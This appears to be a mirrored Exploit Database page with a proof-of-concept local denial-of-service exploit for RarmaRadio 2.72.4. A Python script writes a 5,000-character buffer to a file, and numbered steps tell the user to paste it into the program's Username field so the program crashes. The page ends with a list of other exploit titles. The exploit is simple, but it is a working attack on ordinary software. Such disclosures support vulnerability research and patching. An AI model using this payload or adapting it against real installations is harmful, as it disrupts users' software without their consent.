RarmaRadio 2.72.4 – ‘username’ Denial of Service (PoC)

Exploit Database
98 阅读

作者： chuyreds

日期： 2020-02-06
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/48014/

# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
# Tested Version: 2.72.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: rarmaradio_username.py
#2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard
#3.- Open RarmaRadio
#4.- Select "Edit" > "Settings" > "Network"
#5.- In "Username" field paste Clipboard
#6.- Select "OK"
#7.- Crashed
buffer = "\x41" * 5000
f = open ("RarmaRadio2.72.4_username.txt", "w")
f.write(buffer)
f.close()

last Exploits
RarmaRadio 2.72.4 – ‘username’ Denial of Service (PoC)的更多信息

Adobe Flash TextField.setFormat – Use-After-Free：
BlueZone Desktop – Multiple Malformed Files Local Denial of Service Vulnerabilities：
Apple iOS Safari – ‘decodeURI’ Remote Crash：
LeadTools ActiveX Raster Twain 16.5 – ‘LtocxTwainu.dll’ Buffer Overflow (PoC)：
FreeVimager 4.1.0 – Crash (PoC)：
Google Chrome < M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free：
Adobe Flash AS2 – textfield.filters Use-After-Free (2)：
PSFTPd Windows FTP Server 10.0.4 Build 729 – Log Injection / Use-After-Free：